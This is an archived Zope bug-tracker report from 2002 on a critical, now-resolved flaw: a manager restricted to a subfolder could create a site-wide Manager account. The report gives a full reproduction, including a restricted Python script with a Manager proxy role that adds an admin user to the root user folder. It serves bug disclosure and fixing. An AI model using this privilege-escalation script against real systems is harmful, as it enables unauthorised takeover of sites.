[ZCM] [ZC] 254/ 3 Resolve "Manager in lower folder can create manager in higher folder"

Collector: Zope Bugs and Patches ... zope-coders@zope.org
Fri, 01 Mar 2002 13:08:30 -0500 

Issue #254 Update (Resolve) "Manager in lower folder can create manager in higher folder"
 ** Security Related ** (Public)
 Status Resolved, Zope/bug critical
To followup, visit:
  http://collector.zope.org/Zope/254

==============================================================
= Resolve - Entry #3 by matt on Mar 1, 2002 1:08 pm

 Status: Accepted => Resolved

Fixed in Zope 2.4.4, Zope 2.5.1, and CVS trunk; the user object being returned by getUserById was not wrapped in the surrounding context, preventing ZopeSecurityPolicy_validate from being able to filter out roles the owner did not possess.
________________________________________
= Assign_confidential - Entry #2 by matt on Mar 1, 2002 10:26 am

 Status: Pending => Accepted

 Supporters added: matt


________________________________________
= Request - Entry #1 by stevea on Feb 28, 2002 6:06 am

This was reported by ivo@amaze.nl, and is a very current concern on his FreeZope service. One of the users of that service reported this exploit.

I have personally verified that this works on a fresh Zope 2.5.0 compiled from source on Linux.

Basically, a user defined in 

  /subfolder/acl_users/trusted_user

with manager role, can use a restricted python script with proxy roles to create a new user with manager role in the root acl_users folder.

Here's how to do it.

Stage 1: set up the environment.

1: take a fresh Zope 2.5.0

2: log in as the default admin user

3: create a folder in the root folder, called "subfolder". Check the box to create a user-folder in subfolder.

4: Create a user "trusted_user" in /subfolder/acl_users, with the role of Manager.

5: Log out as admin

Stage 2: trusted_user creates a manager in the root acl_users

1: log into /subfolder/manage as trusted_user

2: create a Script (Python)

3: edit it as following:

 request = container.REQUEST
 userfolder = getattr(request.PARENTS[-1], 'acl_users')
 user_info = { 'name': 'new_manager',
               'password': 'secret',
               'confirm': 'secret',
               'roles': ['Manager','Owner'],
               'domains': []
              }
 userfolder.manage_users(submit='Add', REQUEST=user_info)
 return "hacked"

4: Go to the proxy tab, and give it the Manager proxy role.

5: test the script. It will return the string "hacked"

6: log out as trusted_user

Stage 3: abusing the new power

1: go to the url /manage. Log in as new_manager:secret

2: do bad stuff


==============================================================